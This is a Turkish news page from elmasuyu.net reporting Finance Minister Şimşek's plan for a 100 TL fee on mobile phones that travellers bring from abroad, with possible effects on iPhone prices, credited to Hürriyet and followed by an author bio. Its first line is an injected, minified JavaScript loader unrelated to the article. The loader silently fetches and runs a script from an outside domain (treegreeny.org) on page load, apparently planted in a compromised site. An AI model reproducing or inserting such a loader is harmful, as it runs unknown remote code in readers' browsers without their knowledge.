;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Yurtdışı iPhone'cularına Darbe - elmasuyu.net
Kategoriler
Haber iPhone

Yurtdışı iPhone’cularına Darbe

Alamancı dediğimize aldanmayın sadece bir mecazi anlamı var. Haberimiz yurt dışından telefon getiren turist ve vatandaşlar için önem arz etmekte. Maliye Bakanı Şimşek, yurtdışından yolcu beraberinde getirilen cep telefonlarından 100 TL’lik harç alınması uygulamasına geçileceğini söyledi. Yurtdışına giden yolcular yılda 1 milyondan fazla cep telefonunu beraberinde Türkiye’ye getirince Hükümet yeni önlem aldı. Yolcuların getirdiği cep telefonlarından 100 TL harç alınacağını açıklayan Maliye Bakanı Mehmet Şimşek, “Türkiye’de yılda 15 milyon cep telefonu ithal ediliyor. 1 milyon cep telefonu da yolcu beraberinde ülkeye giriyor. Bu çok ciddi boyutlara ulaştı” dedi. Bu telefon trafiğinin en önemli bölümlerinden birini de iPhone’lar teşkil etmekte. Dolayısıyla bundan sonra yurtdışından gelen iPhoneların piyasasında biraz dalgalanma olabilecek.

Kaynak: Hürriyet

Yazar Cem YENER

ElmaSuyu.Net Yöneticisi - Site faaliyetlerinin yanında bilgisayar dünyası ile yakından ilgili. Mac ve iOS özellikle ilgilendi konulardır.
Üniversite Program Koordinatörü - Bir devlet üniversitesinin İngilizce Hazırlık Programı Koordinatörü ve Akademik Direktörlüğünü yürütmekte.
@jamwinner